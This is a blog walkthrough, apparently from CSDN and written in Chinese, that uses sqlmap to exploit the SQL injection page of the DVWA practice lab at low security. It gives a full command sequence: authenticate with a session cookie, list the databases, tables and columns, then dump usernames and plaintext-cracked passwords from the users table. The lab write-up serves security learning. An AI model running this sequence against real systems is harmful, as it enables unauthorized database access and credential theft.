【渗透测试】【Sqlmap】DVWA-SQL Injection(low)

最新推荐文章于 2024-06-26 01:09:19 发布
最新推荐文章于 2024-06-26 01:09:19 发布
阅读量358 收藏 1
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/preserphy/article/details/80925077
版权

①进入sqlmap目录,使用-u命令访问地址:

python sqlmap.py -u "http://192.168.133.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"

发现跳转到302了,被重定向了,所以这样不行…

又回到浏览器页面看了一下请求,发现里面有cookie,所以我们要把相应的cookie加上。

②使用--cookie命令加上相应的low级别的cookie,再跑一次。因为怕它一直询问,所以为了方便起见,加了--batch命令,让它可以自动回答询问:

python sqlmap.py -u "http://192.168.133.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5tnrugc0q5gfbjejbmcr97rgj5" --batch

跑成功了。

③接下来要跑一下数据库,使用--dbs命令:

python sqlmap.py -u "http://192.168.133.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5tnrugc0q5gfbjejbmcr97rgj5" --batch --dbs

可以看到有8个数据库。

④接下来我们可以用-D命令指定数据库,用--tables命令查看其中所有表

python sqlmap.py -u "http://192.168.133.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5tnrugc0q5gfbjejbmcr97rgj5" --batch -D dvwa --tables

嗯,有两个表,显而易见,用户信息肯定在users表里面。

⑤用-T命令指定表,用--columns命令查看表的列:

python sqlmap.py -u "http://192.168.133.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5tnrugc0q5gfbjejbmcr97rgj5" --batch -D dvwa -T users --columns

胜利的曙光就在前方了。我们可以看到表中有字段user和password,也就是用户名和密码了。

⑥最后我们可以用-C命令指定需要的列,用--dump命令将其中的数据脱出来:

python sqlmap.py -u "http://192.168.133.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=5tnrugc0q5gfbjejbmcr97rgj5" --batch -D dvwa -T users -C user,password --dump

OK,可以看到用户名和密码了,而且密码还被译成了明文。

 

Kingyo12
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一起学安全测试——用sqlmapdvwa实现SQL注入测试
灰蓝
03-29 1万+
sqlmap是一款进行SQL注入的工具,非常简单好用。我们在dvwa上试着用sqlmap实现注入,拿到数据库的信息。搭建dvwa环境并启动。 windows上需要搭建Python环境,下载sqlmap包并解压。kali linux自带(之后演示在kali上)。 设置dvwa级别为low(medium,high都可以,不要设成impossible就行) 打开dvwaSQL Injection,打开浏
DVWA -SQL Injection (low)
qq_42630215的博客
05-26 259
low级别(手工注入 和 sqlmap工具注入) ** 手动注入 ** 1.判断是否存在注入,注入的类型是字符型还是数字型 输入1:(输入1-5都会返回正确的值) 输入 1’(发现报错,存在注入漏洞) Id是被’ ‘包括起来的,是属于字符型注入 闭合 输入 1’ and ‘1’=’1(查询成功,会返回正确的值) 输入1’ or ‘1’=’1 时,因为这个式子是永真的,返回了所有结果。 2.猜测sql查询语句中的字段数 1’ order by 3# 1’ order by 2# 3.确定显示的字段
使用Python脚本学习DVWA-SQL InjectionSQL注入)
weixin_43838889的博客
04-24 1412
使用Python脚本学习DVWASQL InjectionSQL注入)Low SQL InjectionSQL注入) 本文全程参考[https://blog.csdn.net/zy15667076526/article/details/109705286?utm_medium=distribute.pc_relevant.none-task-blog-baidujs_baidulandingword-0]向该博主致谢 SQL InjectionSQL注入) SQL Injection,即SQL注入,
python编写DVWA_SQL injection POC脚本
weixin_44248977的博客
10-04 196
是对DVWA_SQLinjection关卡的python编写的SQL验证POC,输入字典,url,和正确的参数就能试验批量验证
sqlmap命令学习及测试dvwa_SQL_Injection
最新发布
qq_58553228的博客
06-26 442
内容有常见的sqlmap的options,至于script暂未学习到。
python——web应用程序之使用sqlmap完成sql注入漏洞攻击
qq_40909772的博客
11-01 1189
1.SQL注入。 SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。攻击者可以向SQL中插入非正常代码,巧妙构造 SQL语句,从而获取攻击者想要的数据。SQL注入攻击中,主要向变量值插入黑客攻击代码以发动攻击。 如: $query = "SELECT * FROM USER WHERE ID=$id and PWD=$pw...
Sqlmap
mumuzi2的博客
02-25 389
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
渗透测试学习2---DVWASQL Injection
正在学习的路上...
04-26 272
1.low PHP源码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; ...
SQLmap--SQL注入渗透测试工具
04-18
SQLmap--SQL注入渗透测试工具 方便进行SQL注入的渗透测试,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。 它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹...
sqlmap中文手册-sql注入自动化测试工具
07-19
它可以帮助安全测试人员和渗透测试专家快速识别和利用Web应用程序中的SQL注入弱点,从而获取数据库中的敏感信息,甚至控制底层文件系统和操作系统。该工具是免费开源的,具有广泛的社区支持和持续更新。 SQLMap的...
渗透测试必备神器SQLMAP的所有绕waf脚本合集
10-18
SQLMAP是一款开源的自动化渗透测试工具,专门用于检测和利用SQL注入漏洞。它以其高效、智能化的特点,在网络安全领域中备受青睐。SQL注入攻击是黑客利用应用程序处理用户输入时的疏忽,将恶意的SQL代码注入到查询...
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
这个工具的主要目标是检测并利用网站应用程序中的SQL注入漏洞,帮助安全研究人员或渗透测试人员发现潜在的安全风险,提升网络系统的安全性。在本文中,我们将深入探讨SQLMap的功能、工作原理以及如何使用它来检测和...
SqlMap-Sql注入
08-02
Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix...
SQL注入(DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
tmzy1的博客
03-19 5949
SQL注入(DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
DVWA通过攻略之SQL注入
勿山几已
05-24 8599
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
DVWA之暴力破解二(手动注入和使用sqlmap
cai_huaer的博客
04-19 1594
因为之前我们是登录进来,所以有一个cookie,现在我们之间用url去请求,没有附带cookie,所以这时是需要重新回到登录页面的。再回到之前的源代码那,可以看到,密码是md5加密后再存的,所以在网上搜索md5解密,把爆破出来的密码成功还原。然后我们分析,user变量是用单引号‘去识别的,那我们在输入的时候,自己加入’后再加入一些其他的内容是不是也可以。后台数据库是MySQL,然后有两个数据库,一个是information_schema,一个是dvwa。3.接着,我们继续注入,爆破所有的数据库。
DVWA--sql注入(工具注入)
firecjh的博客
06-09 558
(6)导出DBname数据库table表中指定列的数据。(5)列出DBname数据库table表中的所有列。(4)列出DBname数据库所有的表。的中级进行注入,写出实验步骤。(2)列出所有的数据库。(3)列出当前数据库。
DVWASQL Injection
baynk的博客
10-29 1688
汇总链接: https://baynk.blog.csdn.net/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ SQL ...
DVWA靶场-SQL Injection(难度低、中、高)-sqlmap自动化漏洞扫描
weixin_43850721的博客
12-14 2791
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第一个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa
如何利用sqlmap--sql-shell
06-11
使用`--sql-shell`选项可以让你在目标数据库上执行任意的SQL语句。以下是使用`--sql-shell`选项的基本步骤: 1. 首先,使用SQLMap进行探测并确认数据库注入漏洞是否存在。可以使用以下命令进行探测: ``` sqlmap...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值